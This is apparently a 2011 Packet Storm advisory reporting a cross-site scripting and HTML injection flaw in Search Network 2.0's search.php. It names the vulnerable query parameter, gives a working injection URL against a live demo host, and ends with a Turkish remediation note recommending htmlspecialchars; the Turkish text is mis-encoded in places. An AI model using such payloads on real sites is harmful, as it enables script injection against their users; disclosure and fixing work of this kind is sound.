Search Network 2.0 Cross Site Scripting

2011-08-07T00:00:00
ID PACKETSTORM:103780
Type packetstorm
Reporter darkTR
Modified 2011-08-07T00:00:00

Description

                                        
                                            `##############################################################  
  
[#] Script Name : Search Network 2.0  
  
[#] Vulnerable Type : XSS Vulnerability  
  
[#] Author : darkTR  
  
[#] Date : 03.08.2011  
  
[#] E-mail : darkTR@hotmail.com  
  
[#] Target: : search.php?action=search_results&query=[XSS]  
  
[#] Demo: : http://developer.searchnetworkhq.com/demo/search.php?  
  
#############################################################  
  
Exploits :  
  
HTML ÝNJECTION  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“><marquee>darkTR<%2Fmarquee>  
  
XSS  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]  
  
Açýðýn Kapatýlmasý ;  
  
  
Htmlspecialchars kullanarak açýðý kapatabiliriz. Ýndex.php dosyasýný açarak ;  
  
$result = file_get_contents($url);, (Helvetica, sans-serif">Bu kýsmý aþaðýdaki þekilde düzeltmeliyiz.)  
  
$result = htmlspecialchars(file_get_contents($url));  
  
Düzeltme iþleminden sonra ">,<" gibi karakterler html’ye dönüþecektir ve zaafiyet ortadan kalkacaktýr.  
  
darkTR | Code Hunters TIM   
`